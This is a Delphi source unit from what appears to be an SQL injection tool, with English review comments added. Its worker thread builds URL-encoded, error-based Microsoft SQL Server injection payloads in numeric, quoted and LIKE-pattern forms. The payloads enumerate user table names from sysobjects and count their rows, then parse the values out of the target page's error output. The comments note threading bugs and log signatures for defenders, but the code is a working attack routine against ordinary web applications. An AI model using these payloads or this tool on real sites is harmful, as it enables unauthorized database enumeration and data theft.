unit ThreadErrorTable;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,ComCtrls;
type
  // Worker thread that asks a remote page for one table name and that table's
  // row count, then appends both to the main form's list view (see Execute).
  TThreadErrorTable = class(TThread)
    // No visibility keyword precedes these fields, so they are reachable from
    // outside the class; presumably the code that creates the thread fills in
    // FURL and iRow before starting it -- TODO confirm against the caller.
    FURL: string;        // base URL handed to GetTableName / GetRecordCount
    iRow: integer;       // passed to GetTableName as its iTop argument
    complete: boolean;   // false while Execute is working, true once the row is added
    TableName: string;   // value returned by GetTableName
    RowCount: string;    // value returned by GetRecordCount
  private
    function GetURLContent(URL: string): string;
    function GetTableName(str_url: string; iTop: integer): string;
    function GetURLMsgTableName(URL: string): string;
    function GetResultStr(str: string): string;
    function GetRecordCount(str_url, TableName: string): string;
  published
    // NOTE(review): TThread declares Execute as protected; this declaration
    // publishes it, so it can also be called directly on the calling thread.
    procedure Execute; override;
  end;
implementation
uses
main_unit,CJdatabase_unit,define_unit,ThreadHttpGet;
//******************************************************************************
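procedure TThreadErrorTable.Execute;
// Thread body: waits one second, then keeps querying the remote page until
// both a table name and a row count come back as something other than the
// '未知' sentinel, and finally appends the pair to Form_main.ListView_table.
//
// Change from the original: the label/goto retry is now a repeat..until loop
// that also leaves when the thread has been asked to terminate. The original
// loop had no exit other than success, so a stopped scan kept issuing requests.
//
// NOTE(review): there is still no retry limit and no delay between attempts.
// A page that never returns the '^' marker receives back-to-back, nearly
// identical requests; in the server's access log that repetition is a
// recognisable trace of this routine.
var
  item: TListItem;
begin
  Sleep(1000);
  complete := false;
  repeat
    // Honour Terminate so the owner can actually stop the worker.
    if Terminated then
      Exit;
    TableName := GetTableName(FURL, iRow);
    RowCount := GetRecordCount(FURL, TableName);
  until (TableName <> '未知') and (RowCount <> '未知');

  // NOTE(review): the list view is a VCL control and this code runs on the
  // worker thread. VCL access is not thread-safe; it should be marshalled to
  // the main thread with Synchronize, which needs a helper method declared on
  // the class and is therefore not done here.
  item := Form_main.ListView_table.Items.Add;
  item.Caption := IntToStr(item.Index + 1);
  // ThdObjCompleteCount is not declared in this unit; it appears to be a
  // counter shared by all workers and is incremented here without any lock.
  ThdObjCompleteCount := ThdObjCompleteCount + 1;
  item.SubItems.Add(TableName);
  item.SubItems.Add(RowCount);
  complete := true;
end;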
//******************************************************************************
function TThreadErrorTable.GetResultStr(str: string): string;
// Returns the text that sits between the first two '^' characters of str.
// If only one '^' is present, everything after it is returned. If there is
// no '^', or nothing follows the marker, the sentinel '未知' is returned.
var
  openPos, closePos: integer;
  inner: string;
begin
  inner := '';
  openPos := Pos('^', str);
  if openPos > 0 then
  begin
    // Keep the tail that follows the opening marker.
    inner := Copy(str, openPos + 1, MaxInt);
    closePos := Pos('^', inner);
    // Trim at the closing marker when there is one.
    if closePos > 0 then
      inner := Copy(inner, 1, closePos - 1);
  end;
  if inner <> '' then
    Result := inner
  else
    Result := '未知';
end;
//******************************************************************************
//函数:判断某个页面是否存在
function TThreadErrorTable.GetURLMsgTableName(URL: string):string;
// Downloads the response for URL and returns whatever GetResultStr extracts
// from it (the text between '^' markers, or the '未知' sentinel).
// The original header comment describes this as a page-existence check; the
// code performs no such check, it only fetches and parses.
begin
  Result := GetResultStr(GetURLContent(URL));
end;
//****************************************************************************
//获取页面内容
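function TThreadErrorTable.GetURLContent(URL: string): string;
// Fetches URL through a helper TThreadHttpGet thread and returns the text
// the helper stored in sContent. Blocks (polling every 50 ms) until the
// helper sets its Success flag.
//
// Fix: the helper is now created before the try block. In the original the
// constructor ran inside try, so a failing Create reached the finally clause
// with IdGetObj still uninitialised and Free was called on a garbage pointer.
var
  IdGetObj: TThreadHttpGet;
begin
  Result := '';
  IdGetObj := TThreadHttpGet.Create(true); // created suspended
  try
    // TimeOut is defined outside this unit; the original comment gives it as
    // 30 seconds.
    IdGetObj.TimeOut := TimeOut;
    IdGetObj.FURL := URL;
    IdGetObj.Success := false;
    IdGetObj.Resume;
    // NOTE(review): this wait has no bound of its own. It ends only when the
    // helper sets Success, so it relies on the helper doing that after a
    // failed or timed-out request as well -- confirm in ThreadHttpGet.
    while not IdGetObj.Success do
    begin
      // NOTE(review): this function is reached from Execute, i.e. on a worker
      // thread. Application.ProcessMessages is meant for the main thread.
      Application.ProcessMessages;
      Sleep(50);
    end;
    Result := IdGetObj.sContent;
  finally
    IdGetObj.Free;
  end;
end;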
//**********************************************************
//函数:获取数据库表名
function TThreadErrorTable.GetTableName(str_url:string;iTop:integer):string;
// Builds a request URL by appending a URL-encoded T-SQL fragment to str_url,
// fetches it, and returns the text found between '^' markers in the response
// (or '未知' when no marker is found -- see GetResultStr).
//
// What the appended fragment does, as far as the literal below shows:
//   * it reads the name column of [FDbName]..[sysobjects] restricted to
//     xtype = char(85) (the letter 'U'), using nested "Top iTop ... asc" /
//     "Top 1 ... desc" ordering to pick one row;
//   * it wraps that name in char(94) ('^') and casts it to varchar(8000);
//   * it compares the resulting string with the integer 0 (">0").
// Presumably the target is Microsoft SQL Server and the page echoes the
// resulting conversion error, which is how the name ends up in the response
// body -- the unit name (ThreadErrorTable) points the same way.
//
// Defensive reading: requests carrying "sysobjects", "char(94)" and
// "cast(... as varchar(8000))" in the query string are a stable signature of
// this routine in web-server and WAF logs. Parameterised queries on the target
// and generic (non-echoing) error pages remove what it depends on.
var
str_ext:string;
URL:string;
begin
//*********************
// FDbName is not declared in this unit; it appears to be shared state from
// another unit. It is written here from a worker thread, and the edit control
// it is read from is a VCL object touched off the main thread.
FDbName:=Form_main.suiEdit_dbname.Text;
try
//*********************
// %20 is a space and %2B is '+'. iTop and FDbName are concatenated as-is.
str_ext:='%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))' +
'%20from(Select%20Top%20' + inttostr(iTop) + '%20id,name%20from%20[' + FDbName + ']..[sysobjects]' +
'%20Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0';
// Inject_methord is defined outside this unit. It selects how the fragment
// is attached to the caller's URL.
case Inject_methord of
0: begin
//(disabled) Application.MessageBox warning: "this injection URL may not be injectable; unknown injection method"
// NOTE(review): leaves without ever assigning Result.
exit;
end;
1: begin
// Fragment appended unchanged.
URL:=str_url+str_ext;
end;
2: begin
// A single quote precedes the fragment and " And ''='" follows it --
// presumably for a parameter that the page places inside quotes.
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
// Same as 2 with %25 ('%') on both sides -- presumably for a parameter used
// in a LIKE pattern.
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
// NOTE(review): the case has no else branch; for any other Inject_methord
// value URL is never assigned and the request below is still made.
//*********************
result:=GetURLMsgTableName(URL);
finally
// Empty finally: this try block performs no cleanup.
end;
end;
//******************************************************************************
//**********************************************************
//函数:获取表的记录数 ,返回一个表示记录数的字符
function TThreadErrorTable.GetRecordCount(str_url,TableName:string):string;
// Builds a request URL that asks for Count(1) of [FDbName]..[TableName],
// fetches it, and returns the number found between '^' markers in the
// response as a string. Returns '未知' when the extracted text is not an
// integer.
//
// The fragment follows the same pattern as GetTableName: the count is cast to
// varchar(8000), wrapped in char(94) ('^') and compared with 0, presumably so
// that the database error text shown by the page contains the value.
//
// Defensive reading: the request is recognisable in logs by "Count(1)",
// "char(94)" and "cast(... as varchar(8000))" in the query string. Note also
// that TableName arrives from Execute as the result of a previous response,
// so text returned by the remote server is placed into the next request
// without any escaping.
var
sCount:string;//holds the returned string that represents the record count
URL:string;
str_ext:string;
begin
//*********************
// FDbName is not declared in this unit; it appears to be shared state from
// another unit, written here from a worker thread.
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
// %20 is a space and %2B is '+'. FDbName and TableName are concatenated as-is.
str_ext:='%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))'+
'%2Bchar(94)%20From%20['+FDbName+']..['+ TableName + ']%20Where%201=1)>0';
//*********************
// Inject_methord is defined outside this unit. It selects how the fragment
// is attached to the caller's URL (same three forms as in GetTableName).
case Inject_methord of
0: begin
//(disabled) Application.MessageBox warning: "this injection URL may not be injectable; unknown injection method"
// NOTE(review): leaves without ever assigning Result.
exit;
end;
1: begin
// Fragment appended unchanged.
URL:=str_url+str_ext;
end;
2: begin
// A single quote precedes the fragment and " And ''='" follows it.
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
// Same as 2 with %25 ('%') on both sides.
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
// NOTE(review): no else branch; for any other Inject_methord value URL is
// never assigned and the request below is still made.
//*********************
try
sCount:=GetURLMsgTableName(URL);
except
on E:Exception do
begin
// Every exception is swallowed here; sCount then keeps whatever it held and
// the StrToInt check below decides the outcome.
//(disabled) Application.MessageBox: "exception while fetching the table record count, operation aborted" + E.Message
end;
end;
try
// The converted number is discarded; the call only checks that sCount
// parses as an integer.
strtoint(sCount);
except
sCount:='未知';
end;
result:=sCount;
end;
end.